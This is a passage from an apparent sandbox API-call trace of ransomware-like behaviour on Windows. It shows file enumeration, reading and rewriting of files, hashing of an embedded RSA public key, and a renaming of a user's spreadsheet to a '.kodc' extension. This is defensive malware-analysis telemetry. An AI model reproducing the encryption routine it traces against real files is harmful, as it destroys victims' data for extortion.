dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f08 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f38 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f20 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ed8 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5c98 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.939] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x155bd, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x155bd, lpOverlapped=0x0) returned 1 [0100.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.940] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x155c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.940] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.940] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.941] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.941] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.941] CloseHandle (hObject=0x5cc) returned 1 [0100.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dc90 | out: hHeap=0x630000) returned 1 [0100.942] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\c9ton.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\c9ton.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\c9ton.xls.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\c9ton.xls.kodc")) returned 1 [0100.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.943] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0100.944] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8ddb250, ftCreationTime.dwHighDateTime=0x1d5c54d, ftLastAccessTime.dwLowDateTime=0xf55b4610, ftLastAccessTime.dwHighDateTime=0x1d5c0de, ftLastWriteTime.dwLowDateTime=0xf55b4610, ftLastWriteTime.dwHighDateTime=0x1d5c0de, nFileSizeHigh=0x0, nFileSizeLow=0x13bc9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HwzIFfRvkMh98zM1.avi", cAlternateFileName="HWZIFF~1.AVI")) returned 1 [0100.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0100.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.944] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\HwzIFfRvkMh98zM1.avi") returned=".avi" [0100.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\HwzIFfRvkMh98zM1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\hwziffrvkmh98zm1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.944] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=80841) returned 1 [0100.945] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.947] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13ba3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.947] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.948] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.948] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x13bc9, lpOverlapped=0x0) returned 1 [0100.950] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.950] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.950] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.950] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0100.951] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.951] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.951] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.951] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.951] GetLastError () returned 0x0 [0100.951] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.951] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0100.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.951] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.951] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.951] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x13bd0) returned 0x9bb8968 [0100.952] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5c98 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ed8 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5ce0 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ef0 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f20 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f38 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.952] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f20 | out: hHeap=0x630000) returned 1 [0100.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f38 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f38 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7f20 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f38 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f20 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.953] GetCurrentThreadId () returned 0x42c [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7a98 [0100.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.954] GetCurrentThreadId () returned 0x42c [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f20 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f38 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap 